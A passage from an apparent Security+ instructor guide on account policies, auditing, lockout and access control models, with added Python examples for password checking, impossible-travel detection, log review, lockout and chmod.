terminated employee's account wasn't disabled. Since the account was no longer being
used, it should not have been left active for a malicious user to exploit.


7. For what type of account would interactive logon be disabled?

Interactive logon refers to starting a shell. Service accounts do not require this type
of access. Default superuser accounts, such as Administrator and root, may also be
disabled, or limited to use in system recovery or repair.

8. What type of files most need to be audited to perform third-party credential
management?

SSH and API keys are often unsecurely embedded in computer code or uploaded
mistakenly to repositories alongside code. Also, managing shared credentials can be
difficult, and many sites resort to storing them in a shared spreadsheet.


Topic 8B
Implement Account Policies

EXAM OBJECTIVES COVERED
3.7 Given a scenario, implement identity and account management controls

Teaching Tip: This topic covers technical controls for account management, such as
system-enforced policies and auditing tools.

Account policies enforce the privilege management policy by setting what users can
and cannot do. This helps you to enforce strong credential policies and to detect and
manage risks from compromised accounts. Auditing and permission reviews can reveal
suspicious behavior and attempts to break through security.

Account Attributes and Access Policies

As well as authenticating the user, an account can be configured with attributes as
a user profile. Account objects can also be used to assign permissions and access
policies.

Account Attributes

A user account is defined by a unique security identifier (SID), a name, and a
credential. Each account is associated with a profile. The profile can be defined with
custom identity attributes describing the user, such as a full name, email address,
contact number, department, and so on. The profile may support media, such as an
account picture.

As well as attributes, the profile will usually provide a location for storing user-
generated data files (a home folder). The profile can also store per-account settings for
software applications.

Access Policies

Each account can be assigned permissions over files and other network resources
and access policies or privileges over the use and configuration of network hosts.
These permissions might be assigned directly to the account or inherited through
membership of a security group or role. Access policies determine things like the right
to log on to a computer locally or via remote desktop, install software, change the
network configuration, and so on.

On a Windows Active Directory network, access policies can be configured via group
policy objects (GPOs). GPOs can be used to configure access rights for user/group/
role accounts. GPOs can be linked to network administrative boundaries in Active
Directory, such as sites, domains, and Organizational Units (OUs).

Show Slide(s): Account Attributes and Access Policies


Configuring access policies and rights using Group Policy Objects in Windows Server 2016.
(Screenshot used with permission from Microsoft.)

Account Password Policy Settings

System-enforced account policies can help to enforce credential management
principles by stipulating requirements for user-selected passwords:

• Password length enforces a minimum length for passwords. There may also be a
maximum length.

• Password complexity enforces password complexity rules (that is, no use of
username within password and combination of at least eight upper/lower case
alphanumeric and non-alphanumeric characters).

• Password aging forces the user to select a new password after a set number of
days.

• Password reuse and history prevents the selection of a password that has been
used already. The history attribute sets how many previous passwords are blocked.

In this context, you should note that the most recent guidance issued by NIST (nvlpubs.
nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf) deprecates some of the
traditional elements of password policy:

• Complexity rules should not be enforced. The user should be allowed to choose
a password (or other memorized secret) of between 8 and 64 ASCII or Unicode
characters, including spaces. The only restriction should be to block common
passwords, such as dictionary words, repetitive or sequential strings, strings
found in breach databases, and strings that repeat contextual information, such as
username or company name.

• Aging policies should not be enforced. Users should be able to select if and when
a password should be changed, though the system should be able to force a
password change if compromise is detected.

• Password hints should not be used. A password hint allows account recovery by
submitting responses to personal information, such as first school or pet name.

Show Slide(s): Account Password Policy Settings

Teaching Tip: Students should appreciate that the syllabus regards complexity and
aging as appropriate policies, but make them aware of the updated NIST guidance.
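The NIST-style rules above (a length window instead of composition rules, plus a blocklist of common, breached, repetitive and context-derived strings) are easy to express as an acceptance check. The Python below is an added example, not code from the CompTIA guide or from NIST: the common-password and breach lists are tiny constructed stand-ins for the large corpora a real deployment would query, and the sequential-run detector is this example's own heuristic.

```python
"""Password acceptance check modelled on the NIST SP 800-63B guidance:
8 to 64 characters, no composition rules, but reject blocklisted,
breached, repetitive/sequential and context-derived strings.

Added example (not from the CompTIA guide). The two word lists are
constructed stand-ins for real corpora.
"""
import re
import unicodedata

MIN_LEN, MAX_LEN = 8, 64

# Constructed stand-ins for the real corpora.
COMMON_PASSWORDS = {"password", "qwerty123", "letmein", "welcome1", "iloveyou"}
BREACHED_PASSWORDS = {"Summer2020!", "P@ssw0rd"}

_REPETITIVE = re.compile(r"^(.+?)\1{2,}$")   # "abcabcabc", "aaaaaaaa"


def _is_sequential(s, run=4):
    """True if s contains `run` consecutive code points ascending or
    descending, e.g. '1234' or 'dcba' (case-insensitive)."""
    codes = [ord(c) for c in s.lower()]
    for i in range(len(codes) - run + 1):
        window = codes[i:i + run]
        diffs = {b - a for a, b in zip(window, window[1:])}
        if diffs == {1} or diffs == {-1}:
            return True
    return False


def check_password(candidate, context=()):
    """Return the list of reasons the password is rejected; empty means OK.

    `context` holds identifiers that must not appear in the secret
    (username, company name, e-mail local part, ...).
    """
    # Normalise so visually identical Unicode forms compare equal
    # (NIST recommends NFKC or NFKD before comparing memorized secrets).
    pw = unicodedata.normalize("NFKC", candidate)
    reasons = []
    if len(pw) < MIN_LEN:
        reasons.append("shorter than %d characters" % MIN_LEN)
    if len(pw) > MAX_LEN:
        reasons.append("longer than %d characters" % MAX_LEN)
    low = pw.lower()
    if low in {p.lower() for p in COMMON_PASSWORDS}:
        reasons.append("common password")
    if pw in BREACHED_PASSWORDS:
        reasons.append("found in breach corpus")
    if _REPETITIVE.match(pw) or _is_sequential(pw):
        reasons.append("repetitive or sequential")
    for item in context:
        if item and len(item) >= 3 and item.lower() in low:
            reasons.append("contains contextual string %r" % item)
    return reasons


if __name__ == "__main__":
    for pw in ["P@ssw0rd", "correct horse battery staple", "abcabcabc",
               "acme-alice-2024", "Tr0ub4dor&3"]:
        print(repr(pw), "->", check_password(pw, context=("alice", "acme")) or "accepted")
```

Note what the check does not do: it never demands a digit or a symbol, so a long passphrase of plain words is accepted while a short "complex" string that appears in a breach corpus is not, which is the point of the guidance.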


The cartoon at xkcd.com/936 sums up the effect of policies on password entropy.

One approach to a password hint is to treat it as a secondary password and submit a
random but memorable phrase, rather than an "honest" answer. The risk in allowing
password hints is demonstrated by the data recovered in the Adobe data breach
(nakedsecurity.sophos.com, "Anatomy of a password disaster: Adobe's giant-sized
cryptographic blunder").

Password reuse can also mean using a work password elsewhere (on a website, for
instance). This sort of behavior can only be policed by soft policies.

Account Restrictions

Show Slide(s): Account Restrictions

To make the task of compromising the user security system harder, account
restrictions can be used.

Location-Based Policies

A user or device can have a logical network location, identified by an IP address,
subnet, virtual LAN (VLAN), or organizational unit (OU). This can be used as an account
restriction mechanism. For example, a user account may be prevented from logging on
locally to servers within a restricted OU.

The geographical location of a user or device can also be calculated using a geolocation
mechanism. There are several types of geolocation:

• IP address: these can be associated with a map location to varying degrees of
accuracy based on information published by the registrant, including name, country,
region, and city. The registrant is usually the Internet service provider (ISP), so the
information you receive will provide an approximate location of a host based on the
ISP. If the ISP is one that serves a large or diverse geographical area, you will be less
likely to pinpoint the location of the host. Software libraries, such as GeoIP
(maxmind.com/en/geoip-demo), facilitate querying this data.

• Location Services: these are methods used by the OS to calculate the device's
geographical position. A device with a global positioning system (GPS) sensor
can report a highly accurate location when outdoors. Location services can also
triangulate to cell towers, Wi-Fi hotspots, and Bluetooth signals where GPS is not
supported.

Geofencing refers to accepting or rejecting access requests based on location.
Geofencing can also be used for push notification to send alerts or advice to a device
when a user enters a specific area. Geotagging refers to the addition of location
metadata to files or devices. This is often used for asset management to ensure devices
are kept with the proper location.

Time-Based Restrictions

There are three main types of time-based policies:

• A time of day policy establishes authorized logon hours for an account.

• A time-based login policy establishes the maximum amount of time an account may
be logged in for.


• An impossible travel time/risky login policy tracks the location of login events over
time. If the distance between successive logins could not have been covered in the
elapsed time, the login is refused and the account may be disabled pending review. For
example, a user logs in to an account from a device in New York. A couple of hours
later, a login attempt is made from LA, but this is refused and an alert raised because it
is not feasible for the user to be in both locations.
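The impossible-travel check above is straightforward to implement once each login event carries a geolocation (in practice derived from the source IP via a GeoIP database, as the previous section describes). The Python below is an added example, not code from the CompTIA guide or from any risk engine: it computes the great-circle distance between a user's consecutive logins, divides by the elapsed time, and alerts when the implied speed is not achievable. The sample events, the 900 km/h ceiling and the 50 km "same area" allowance are constructed assumptions.

```python
"""Impossible-travel detection over a sequence of geolocated login events.

Added example (not from the CompTIA guide). Events are (user, ISO-8601
timestamp, latitude, longitude, label). Consecutive logins for one user
are flagged when distance / elapsed time exceeds MAX_SPEED_KMH. The
sample events and both thresholds are constructed assumptions.
"""
import math
from datetime import datetime, timezone

MAX_SPEED_KMH = 900.0      # assumption: roughly airliner speed
SAME_AREA_KM = 50.0        # assumption: GeoIP jitter inside one metro area
EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def find_impossible_travel(events, max_speed_kmh=MAX_SPEED_KMH):
    """Return one (user, from, to, km, hours, kmh) alert per consecutive
    login pair that implies a speed above max_speed_kmh. Two logins from
    different places at the same instant are reported with speed inf."""
    by_user = {}
    for user, ts, lat, lon, label in events:
        when = datetime.fromisoformat(ts).astimezone(timezone.utc)
        by_user.setdefault(user, []).append((when, lat, lon, label))
    alerts = []
    for user, logins in by_user.items():
        logins.sort()                      # events need not arrive in order
        for (t1, la1, lo1, c1), (t2, la2, lo2, c2) in zip(logins, logins[1:]):
            km = haversine_km(la1, lo1, la2, lo2)
            if km < SAME_AREA_KM:
                continue                   # not travel, just imprecise geolocation
            hours = (t2 - t1).total_seconds() / 3600.0
            kmh = km / hours if hours > 0 else float("inf")
            if kmh > max_speed_kmh:
                speed = kmh if math.isinf(kmh) else round(kmh)
                alerts.append((user, c1, c2, round(km), round(hours, 2), speed))
    return alerts


# Constructed sample: alice is the New York / Los Angeles scenario from
# the text; bob goes from London to Reading over a working day.
SAMPLE_EVENTS = [
    ("alice", "2021-08-30T09:00:00+00:00", 40.7128, -74.0060, "New York"),
    ("alice", "2021-08-30T11:00:00+00:00", 34.0522, -118.2437, "Los Angeles"),
    ("bob",   "2021-08-30T08:30:00+00:00", 51.5074, -0.1278, "London"),
    ("bob",   "2021-08-30T18:45:00+00:00", 51.4545, -0.9781, "Reading"),
]

if __name__ == "__main__":
    for alert in find_impossible_travel(SAMPLE_EVENTS):
        print("%s: %s -> %s, %d km in %.2f h (%s km/h)" % alert)
```

The sample produces a single alert for alice (about 3,900 km in two hours); bob's 59 km in ten hours is ordinary travel. The same-area allowance matters because two GeoIP lookups for one city can sit kilometres apart, which would otherwise produce a flood of false positives at small time deltas.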

Account Audits

Accounting and auditing processes are used to detect whether an account has been
compromised or is being misused. A security or audit log can be used to facilitate
detection of account misuse:

• Accounting for all actions that have been performed by users. Change and version
control systems depend on knowing when a file has been modified and by whom.
Accounting also provides for non-repudiation (that is, a user cannot deny that
they accessed or made a change to a file). The main problems are that auditing
successful access attempts can quickly consume a lot of disk space, and analyzing
the logs can be very time-consuming.

• Detecting intrusions or attempted intrusions. Here records of failure-type events
are likely to be more useful, though success-type events can also be revealing if they
show unusual access patterns.

Recording an unsuccessful attempt to take ownership of an audited folder.
(Screenshot used with permission from Microsoft.)

Account auditing also refers to more general change control. You need to take account
of changes to resources and users. Resources may be updated, archived, or have their
clearance level changed. Users may leave, arrive, or change jobs (roles). For example,
if a user has moved to a new job, old privileges may need to be revoked and new ones
granted. This process is referred to as recertification. Managing these sorts of changes
efficiently and securely requires effective standard operating procedures (SOPs) and
clear and timely communication between departments (between IT and HR, for instance).

Show Slide(s): Account Audits

Teaching Tip: Students should be aware of risks from unmanaged accounts that have
been created and forgotten about and authorization creep.
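The point made above, that failure-type events are the more useful ones and that success events become interesting when they follow an unusual pattern, is easiest to see with a small log review. The Python below is an added example, not code from the CompTIA guide: the log lines are constructed in a simple key=value form that a SIEM might export (the Windows event IDs 4625 for a failed logon and 4624 for a successful logon are the real ones, but the line format itself is this example's assumption). It surfaces a burst of failures from one source against one account, and a success that follows such a burst.

```python
"""Review a security log for account-misuse indicators.

Added example (not from the CompTIA guide). Two findings are produced:
'failure_burst' when FAILURE_THRESHOLD or more 4625 events for the same
(user, source) fall inside WINDOW_S seconds, and 'success_after_burst'
when a 4624 for that pair follows the burst. The line format and the
thresholds are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime

FAILURE_THRESHOLD = 5      # failures from one source before it is a burst
WINDOW_S = 300             # the burst must fit inside this many seconds

# Constructed sample log.
SAMPLE_LOG = """\
2021-08-30T09:00:01 EventID=4625 user=alice src=10.0.0.7
2021-08-30T09:00:03 EventID=4625 user=alice src=10.0.0.7
2021-08-30T09:00:05 EventID=4625 user=alice src=10.0.0.7
2021-08-30T09:00:06 EventID=4625 user=alice src=10.0.0.7
2021-08-30T09:00:08 EventID=4625 user=alice src=10.0.0.7
2021-08-30T09:00:09 EventID=4624 user=alice src=10.0.0.7
2021-08-30T09:10:00 EventID=4625 user=bob src=10.0.0.9
2021-08-30T09:30:00 EventID=4624 user=bob src=10.0.0.9
2021-08-30T10:00:00 EventID=4625 user=svc-backup src=203.0.113.5
2021-08-30T10:00:01 EventID=4625 user=svc-backup src=203.0.113.5
2021-08-30T10:00:02 EventID=4625 user=svc-backup src=203.0.113.5
2021-08-30T10:00:03 EventID=4625 user=svc-backup src=203.0.113.5
2021-08-30T10:00:04 EventID=4625 user=svc-backup src=203.0.113.5
2021-08-30T10:00:05 EventID=4625 user=svc-backup src=203.0.113.5
"""


def parse_line(line):
    """Return (timestamp, event_id, user, src) from one key=value line."""
    ts, *pairs = line.split()
    kv = dict(p.split("=", 1) for p in pairs)
    return datetime.fromisoformat(ts), int(kv["EventID"]), kv["user"], kv["src"]


def review_log(text, threshold=FAILURE_THRESHOLD, window_s=WINDOW_S):
    """Return a list of (kind, user, src) findings in log order."""
    failures = defaultdict(list)     # (user, src) -> timestamps of recent 4625s
    burst_seen = set()
    findings = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        ts, event_id, user, src = parse_line(raw)
        key = (user, src)
        if event_id == 4625:
            times = failures[key]
            times.append(ts)
            while (ts - times[0]).total_seconds() > window_s:
                times.pop(0)           # drop failures outside the sliding window
            if len(times) >= threshold and key not in burst_seen:
                burst_seen.add(key)    # report each burst once
                findings.append(("failure_burst", user, src))
        elif event_id == 4624:
            if key in burst_seen:
                findings.append(("success_after_burst", user, src))
            failures[key].clear()      # a success resets the pair's state
            burst_seen.discard(key)
    return findings


if __name__ == "__main__":
    for kind, user, src in review_log(SAMPLE_LOG):
        print("%-20s user=%s src=%s" % (kind, user, src))
```

On the sample, alice's five quick failures followed by a success is the pattern that warrants an immediate call to the user; bob's single mistake is noise; the svc-backup burst from an external address with no success is still a finding, because service accounts should never be the target of interactive logon attempts at all.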


Account Permissions

Where many users, groups, roles, and resources are involved, managing account
permissions is complex and time-consuming. Improperly configured accounts can
have two different types of impact. On the one hand, setting privileges that are too
restrictive creates a large volume of support calls and reduces productivity. On the
other hand, granting too many privileges to users weakens the security of the system
and increases the risk of things like malware infection and data breach.

The phrase "authorization creep" refers to an employee who gains more and more access
privileges the longer they remain with the organization.

A user may be granted elevated privileges temporarily (escalation). In this case, some
system needs to be in place to ensure that the privileges are revoked at the end of the
agreed period.

A system of auditing needs to be put in place so that privileges are reviewed regularly.
Auditing would include monitoring group membership and reviewing access control
lists for each resource plus identifying and disabling unnecessary accounts.

Determining effective permissions for a shared folder.
(Screenshot used with permission from Microsoft.)

Show Slide(s): Account Permissions

Usage Audits

Usage auditing means configuring the security log to record key indicators and then
reviewing the logs for suspicious activity. Determining what to log is one of the most
considerable challenges a network administrator can face. For Active Directory,
Microsoft has published audit policy recommendations for baseline requirements and
networks with stronger security requirements (docs.microsoft.com/en-us/windows-
server/identity/ad-ds/plan/security-best-practices/audit-policy-recommendations).

Show Slide(s): Usage Audits


Some typical categories include:

• Account logon and management events.

• Process creation.

• Object access (file system/file shares).

• Changes to audit policy.

• Changes to system security and integrity (anti-virus, host firewall, and so on).

Configuring audit entries for a folder in Windows. (Screenshot used with permission from Microsoft.)

Account Lockout and Disablement

Show Slide(s): Account Lockout and Disablement

If account misuse is detected or suspected, the account can be manually disabled
by setting an account property. This prevents the account from being used for login.
Note that disabling the account does not close existing sessions. You can issue a
remote logoff command to close a session. Account disablement means that login is
permanently prevented until an administrator manually re-enables the account.


Setting a property to disable an account. (Screenshot used with permission from Microsoft.)

An account lockout means that login is prevented for a period. This might be
done manually if a policy violation is detected, but there are several scenarios for
automatically applying a lockout:
• An incorrect account password is entered repeatedly.

• The account is set to expire. Setting an account expiration date means that an
account cannot be used beyond a certain date. This option is useful on accounts for
temporary and contract staff.

• When using time- or location-based restrictions, the server periodically checks
whether the user has the right to continue using the network. If the user does not
have the right, then an automatic logout procedure commences.
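The following added Python example (not from the original guide) models the difference between these states: a lockout that the policy applies automatically and that lapses by itself, an expiration date that refuses logon after a fixed date, and a disabled flag that only an administrator clears. The threshold, window and duration values mirror a typical Windows lockout policy but are assumptions, and the account store is an in-memory dataclass.

```python
# Added example (not from the CompTIA guide): how an account lockout
# (automatic, time-limited) differs from disablement (manual) and expiry
# (date-based). Policy values are assumptions; the account store is in memory.
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import List, Optional


@dataclass
class LockoutPolicy:
    threshold: int = 5                                  # failed attempts before lockout
    reset_window: timedelta = timedelta(minutes=30)     # failures older than this are forgotten
    duration: timedelta = timedelta(minutes=30)         # how long an automatic lockout lasts


@dataclass
class Account:
    name: str
    disabled: bool = False                     # set and cleared manually by an administrator
    expires: Optional[datetime] = None         # expiration date for temporary/contract staff
    failures: List[datetime] = field(default_factory=list)
    locked_until: Optional[datetime] = None    # set automatically by the policy


def status(acct, now):
    """'active', or the reason the account cannot currently log on."""
    if acct.disabled:
        return "disabled"
    if acct.expires is not None and now >= acct.expires:
        return "expired"
    if acct.locked_until is not None and now < acct.locked_until:
        return "locked"
    return "active"            # a lockout that has run its course clears itself here


def attempt_logon(acct, policy, now, password_ok):
    """Record one logon attempt and return its outcome."""
    state = status(acct, now)
    if state != "active":
        return state           # refused regardless of the password; not counted
    if password_ok:
        acct.failures.clear()
        return "success"
    acct.failures = [t for t in acct.failures if now - t < policy.reset_window]
    acct.failures.append(now)
    if len(acct.failures) >= policy.threshold:
        acct.locked_until = now + policy.duration
        acct.failures.clear()
        return "locked"
    return "bad password"


def disable(acct):
    acct.disabled = True       # existing sessions are not ended by this; log them off separately


def enable(acct):
    acct.disabled = False
    acct.locked_until = None
    acct.failures.clear()


def demo():
    """Walk one account through lockout, lapse of the lockout, disablement and re-enablement."""
    policy = LockoutPolicy(threshold=3, reset_window=timedelta(minutes=30), duration=timedelta(minutes=15))
    t0 = datetime(2021, 8, 30, 9, 0)
    acct = Account("jsmith")
    outcomes = [
        attempt_logon(acct, policy, t0, False),
        attempt_logon(acct, policy, t0 + timedelta(minutes=1), False),
        attempt_logon(acct, policy, t0 + timedelta(minutes=2), False),   # third failure: locked
        attempt_logon(acct, policy, t0 + timedelta(minutes=3), True),    # right password, still locked
        attempt_logon(acct, policy, t0 + timedelta(minutes=20), True),   # lockout has lapsed by itself
    ]
    disable(acct)
    outcomes.append(attempt_logon(acct, policy, t0 + timedelta(hours=5), True))   # stays refused
    enable(acct)
    outcomes.append(attempt_logon(acct, policy, t0 + timedelta(hours=5), True))
    contractor = Account("contractor", expires=t0 + timedelta(days=30))
    outcomes.append(attempt_logon(contractor, policy, t0 + timedelta(days=31), True))
    return outcomes


def demo_reset_window():
    """Two failures, then a third 40 minutes later: the counter has reset, so no lockout."""
    policy = LockoutPolicy(threshold=3, reset_window=timedelta(minutes=30), duration=timedelta(minutes=15))
    t0 = datetime(2021, 8, 30, 9, 0)
    acct = Account("mjones")
    attempt_logon(acct, policy, t0, False)
    attempt_logon(acct, policy, t0 + timedelta(minutes=1), False)
    return attempt_logon(acct, policy, t0 + timedelta(minutes=41), False)
```

A point the walk-through makes explicit: the correct password is refused while the lockout is in force, the lockout clears with no administrator action, and the disabled flag does not.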

Configuring an account lockout policy. (Screenshot used with permission from Microsoft.)


Review Activity:
Account Policies
Answer the following questions:

1. What container would you use if you want to apply a different security
policy to a subset of objects within the same domain?

Organizational Unit (OU).

2. Why might forcing users to change their password every month be
counterproductive?

More users would forget their password, try to select unsecure ones, or write them
down (record them in a non-secure way, like a sticky note).

3. What is the name of the policy that prevents users from choosing old
passwords again?

Enforce password history.

4. In what two ways can an IP address be used for context-based
authentication?

An IP address can represent a logical location (subnet) on a private network. Most types
of public IP address can be linked to a geographical location, based on information
published by the registrant that manages that block of IP address space.

5. How does accounting provide non-repudiation?

A user's actions are logged on the system. Each user is associated with a unique
computer account. As long as the user's authentication is secure and the logging
system is tamper-proof, they cannot deny having performed the action.

6. Which information resource is required to complete usage auditing?

Usage events must be recorded in a log. Choosing which events to log will be guided by
an audit policy.

7. What is the difference between locked and disabled accounts?

An account enters a locked state because of a policy violation, such as an incorrect
password being entered repeatedly. Lockout is usually applied for a limited duration.
An account is usually disabled manually, using the account properties. A disabled
account can only be re-enabled manually.


Topic 8C
Implement Authorization Solutions

EXAM OBJECTIVES COVERED

2.4 Summarize authentication and authorization design concepts
3.8 Given a scenario, implement authentication and authorization solutions
4.1 Given a scenario, use the appropriate tool to assess organizational security (chmod only)

Teaching Tip: This topic focuses on access control schemes, such as DAC versus MAC. We also
look at authorization protocols in the context of federated identity management. This topic
is quite complex, so be prepared to allocate plenty of time to presenting it.

Implementing an effective authorization solution system requires understanding of the
different models that such systems can be based on. While an on-premises network
can use a local directory to manage accounts and rights, as organizations move
services to the cloud, these authorizations have to be implemented using federated
identity management solutions.

Discretionary and Role-Based Access Control

Show Slide(s): Discretionary and Role-Based Access Control

An important consideration in designing a security system is to determine how users
receive rights or permissions. The different models are referred to as access control
schemes.

Discretionary Access Control (DAC)

Discretionary access control (DAC) is based on the primacy of the resource owner.
The owner is originally the creator of a file or service, though ownership can be
assigned to another user. The owner is granted full control over the resource, meaning
that he or she can modify its access control list (ACL) to grant rights to others.

DAC is the most flexible model and is currently implemented widely in terms of
computer and network security. In terms of file system security, it is the model used
by default for most UNIX/Linux distributions and by Microsoft Windows. As the most
flexible model, it is also the weakest because it makes centralized administration of
security policies the most difficult to enforce. It is also the easiest to compromise, as it
is vulnerable to insider threats and abuse of compromised accounts.

Role-Based Access Control (RBAC)

Role-based access control (RBAC) adds an extra degree of centralized control to
the DAC model. Under RBAC, a set of organizational roles are defined, and subjects
allocated to those roles. Under this system, the right to modify roles is reserved to a
system owner. Therefore, the system is non-discretionary, as each subject account has
no right to modify the ACL of a resource, even though they may be able to change the
resource in other ways. Users are said to gain rights implicitly (through being assigned
to a role) rather than explicitly (being assigned the right directly).

RBAC can be partially implemented through the use of security group accounts, but
they are not identical schemes. Membership of security groups is largely discretionary
(assigned by administrators, rather than determined by the system). Also, ideally, a
subject should only inherit the permissions of a role to complete a particular task
rather than retain them permanently.

Teaching Tip: Real-world implementations of access control do not exactly conform to
these models. Discuss some examples and ask students how they would categorize them.
Emphasize the difference between discretionary and non-discretionary/rule-based access
control. The key difference is where decision-making lies. With DAC, it lies with the
resource owner. In RBAC and MAC, it lies with the system owner (that is, the controls are
enforced system-wide and cannot be countermanded or excepted by users within the system).


File System Permissions

Show Slide(s): File System Permissions

An access control model can be applied to any type of data or software resource
but is most closely associated with network, file system, and database security. With
file system security, each object in the file system has an ACL associated with it. The
ACL contains a list of accounts (principals) allowed to access the resource and the
permissions they have over it. Each record in the ACL is called an access control entry
(ACE). The order of ACEs in the ACL is important in determining effective permissions
for a given account. ACLs can be enforced by a file system that supports permissions,
such as NTFS, ext3/ext4, or ZFS.

Teaching Tip: Both Windows and Linux file permissions are covered at A+ level, so will
hopefully be familiar to the students. chmod is called out as a content example, so we
cover it in a bit more detail than Windows ACLs.

Configuring an access control entry for a folder. (Screenshot used with permission from Microsoft.)

For example, in Linux, there are three basic permissions:

• Read (r): the ability to access and view the contents of a file or list the contents of a
directory.

• Write (w): the ability to save changes to a file, or create, rename, and delete files in
a directory (also requires execute).

• Execute (x): the ability to run a script, program, or other software file, or the ability
to access a directory, execute a file from that directory, or perform a task on that
directory, such as file search.

These permissions can be applied in the context of the owner user (u), a group account
(g), and all other users/world (o). A permission string lists the permissions granted in
each of these contexts:

d rwx r-x r-x home

The string above shows that for the directory (d), the owner has read, write, and execute
permissions, while the group context and other users have read and execute permissions.

The chmod command is used to modify permissions. It can be used in symbolic mode
or absolute mode. In symbolic mode, the command works as follows (the mode is a
single argument, so there must be no space after the comma):

chmod g+w,o-x home


The effect of this command is to append write permission to the group context and
remove execute permission from the other context. By contrast, the command can also
be used to replace existing permissions. For example, the following command applies
the configuration shown in the first permission string:

chmod u=rwx,g=rx,o=rx home

In absolute mode, permissions are assigned using octal notation, where r=4, w=2, and
x=1. For example, the following command has the same effect:

chmod 755 home
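An added Python example (not from the original guide) that models the nine u/g/o bits and applies both chmod modes, so the effect of a mode string can be checked before it is run against a real file system. Only r, w and x are modelled; the setuid, setgid and sticky bits and the X, s and t letters are left out.

```python
# Added example (not from the CompTIA guide): working out what a chmod
# command will do to the nine u/g/o permission bits before running it.
# Only r, w and x with u, g, o and a are modelled; setuid/setgid/sticky
# bits and the X/s/t letters are deliberately left out.
BITS = {"r": 4, "w": 2, "x": 1}
WHO_INDEX = {"u": 0, "g": 1, "o": 2}   # position in the (user, group, other) triple


def parse_string(perm):
    """'drwxr-xr-x' or 'rwxr-xr-x' -> (7, 5, 5)."""
    if len(perm) == 10:          # leading file-type character (d, -, l, ...)
        perm = perm[1:]
    if len(perm) != 9:
        raise ValueError(f"expected 9 permission characters, got {perm!r}")
    digits = []
    for i in range(3):
        value = 0
        for ch, expected in zip(perm[3 * i:3 * i + 3], "rwx"):
            if ch == expected:
                value |= BITS[expected]
            elif ch != "-":
                raise ValueError(f"unexpected character {ch!r} in {perm!r}")
        digits.append(value)
    return tuple(digits)


def to_string(digits):
    """(7, 5, 5) -> 'rwxr-xr-x'."""
    return "".join((letter if d & bit else "-")
                   for d in digits for letter, bit in BITS.items())


def to_octal(digits):
    """(7, 5, 5) -> '755'."""
    return "".join(str(d) for d in digits)


def apply_absolute(digits, octal):
    """chmod 755: the current bits are replaced outright."""
    if len(octal) != 3 or any(c not in "01234567" for c in octal):
        raise ValueError(f"bad absolute mode {octal!r}")
    return tuple(int(c) for c in octal)


def apply_symbolic(digits, mode):
    """Apply a symbolic mode such as 'g+w,o-x' or 'u=rwx,g=rx,o=rx'."""
    result = list(digits)
    for clause in mode.split(","):
        i = 0
        targets = set()
        while i < len(clause) and clause[i] in "ugoa":
            targets |= set("ugo") if clause[i] == "a" else {clause[i]}
            i += 1
        if not targets:      # chmod treats a missing 'who' as 'a' (it also applies the umask; ignored here)
            targets = set("ugo")
        if i >= len(clause) or clause[i] not in "+-=":
            raise ValueError(f"bad clause {clause!r} (no spaces are allowed inside a mode)")
        op, letters = clause[i], clause[i + 1:]
        if any(ch not in BITS for ch in letters):
            raise ValueError(f"bad permission letters in {clause!r}")
        value = sum(BITS[ch] for ch in letters)
        for who in targets:
            idx = WHO_INDEX[who]
            if op == "+":
                result[idx] |= value
            elif op == "-":
                result[idx] &= ~value & 7
            else:
                result[idx] = value
    return tuple(result)


if __name__ == "__main__":
    home = parse_string("drwxr-xr-x")
    print(to_octal(home), to_string(apply_symbolic(home, "g+w,o-x")))
```

Note that the symbolic mode is a single argument: `chmod g+w, o-x home` with a space would make chmod treat `o-x` as a file name, and the parser above rejects it for the same reason.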

Mandatory and Attribute-Based Access Control

Show Slide(s): Mandatory and Attribute-Based Access Control

The DAC and RBAC models expose privileged accounts to the threat of compromise.
More restrictive access control models can be used to mitigate this threat.

Mandatory Access Control (MAC)

Mandatory access control (MAC) is based on the idea of security clearance levels.
Rather than defining ACLs on resources, each object and each subject is granted a
clearance level, referred to as a label. If the model used is a hierarchical one (that is,
high clearance users are trusted to access low clearance objects), subjects are only
permitted to access objects at their own clearance level or below.

The labelling of objects and subjects takes place using pre-established rules. The critical
point is that these rules cannot be changed by any subject account, and are therefore
non-discretionary. Also, a subject is not permitted to change an object's label or to
change his or her own label.

Attribute-Based Access Control (ABAC)

Attribute-based access control (ABAC) is the most fine-grained type of access control
model. As the name suggests, an ABAC system is capable of making access decisions
based on a combination of subject and object attributes plus any context-sensitive or
system-wide attributes. As well as group/role memberships, these attributes could
include information about the OS currently being used, the IP address, or the presence
of up-to-date patches and anti-malware. An attribute-based system could monitor
the number of events or alerts associated with a user account or with a resource, or
track access requests to ensure they are consistent in terms of timing of requests or
geographic location. It could be programmed to implement policies, such as M-of-N
control and separation of duties.

Rule-Based Access Control

Show Slide(s): Rule-Based Access Control

Rule-based access control is a term that can refer to any sort of access control model
where access control policies are determined by system-enforced rules rather than
system users. As such, RBAC, ABAC, and MAC are all examples of rule-based (or non-
discretionary) access control. As well as the formal models, rule-based access control
principles are increasingly being implemented to protect computer and network
systems founded on discretionary access from the sort of misconfiguration that can
occur through DAC.

Teaching Tip: Rule-based access control is also not necessarily dependent on the identity
of the user (a firewall ACL, for instance).

Conditional Access

Conditional access is an example of rule-based access control. A conditional access
system monitors account or device behavior throughout a session. If certain
conditions are met, the account may be suspended or the user may be required to
re-authenticate, perhaps using a 2-step verification method. The User Account Control
(UAC) and sudo restrictions on privileged accounts are examples of conditional access.
The user is prompted for confirmation or authentication when requests that require
elevated privileges are made. Role-based rights management and ABAC systems can
apply a number of criteria to conditional access, including location-based policies
(docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview).
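For the ABAC and conditional access passages above, the following added Python example (not from the original guide) is a small policy decision point: each request carries subject, resource and context attributes, rules are evaluated in order, and the first match decides. The attribute names, the corporate network range, the business hours and the rules themselves are assumptions chosen to mirror the text.

```python
# Added example (not from the CompTIA guide): an attribute-based policy
# decision point that also behaves as conditional access. Every request
# carries subject, resource and context attributes; rules are checked in
# order and the first match decides. The attribute names, network range,
# hours and rules are assumptions chosen to mirror the text.
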